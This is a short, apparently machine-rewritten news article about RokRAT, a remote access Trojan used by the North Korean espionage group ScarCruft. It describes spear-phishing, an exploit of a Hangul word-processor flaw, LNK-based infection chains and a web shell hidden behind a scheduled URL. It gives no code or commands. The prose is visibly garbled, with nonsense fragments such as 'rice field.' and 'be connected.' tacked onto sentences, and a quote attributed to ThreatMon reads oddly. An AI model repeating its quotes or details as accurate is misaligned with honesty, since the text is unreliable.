Cybersecurity researchers have taken a closer look at a remote access Trojan called RokRAT. This Trojan is being used by North Korean state-sponsored attackers. scar craft.
“RokRAT is a sophisticated remote access Trojan (RAT) that has been observed as a key component in the attack chain, allowing attackers to gain unauthorized access, steal sensitive information, and create persistent threats to compromised systems. It could allow us to maintain some kind of control,” said ThreatMon.
ScarCruft, active since at least 2012, is a cyber espionage group operating on behalf of the North Korean government and focused exclusively on targets in the South.
The group is believed to be a subsidiary within the North Korean Ministry of State Security (MSS). The attack chain set up by this group relies heavily on social engineering to attack spear-phishing victims and deliver payloads to targeted networks.
This included exploiting a vulnerability in Hancom’s Hangul word processor (HWP), a productivity software widely used by public and private organizations in South Korea, to distribute its signature malware called RokRAT. It is included.
The Windows backdoor, also known as DOGCALL, is actively developed and maintained, and has since been ported to other operating systems such as macOS and Android.
As evidenced by the AhnLab Security Emergency Response Center (ASEC) and Check Point, recent spear-phishing attacks used LNK files to trigger a multi-stage infection sequence that ultimately led to the deployment of the RokRAT malware. be connected.
Zero Trust + Deception: Learn How to Outsmart Attackers!
See how Deception can detect advanced threats, stop lateral movement, and strengthen your Zero Trust strategy. Join us for an insightful webinar!
Reserve your seat!
RokRAT allows attackers to collect system metadata, take screenshots, execute arbitrary commands received from remote servers, enumerate directories, and extract targeted files.
This development follows ASEC’s disclosure of the ScarCruft attack, which utilizes a Windows executable masquerading as a Korean document to drop malware configured to access an external URL every 60 minutes. rice field.
ASEC pointed out that “The URL registered in Task Scheduler looks like a normal homepage, but it contains a web shell.”
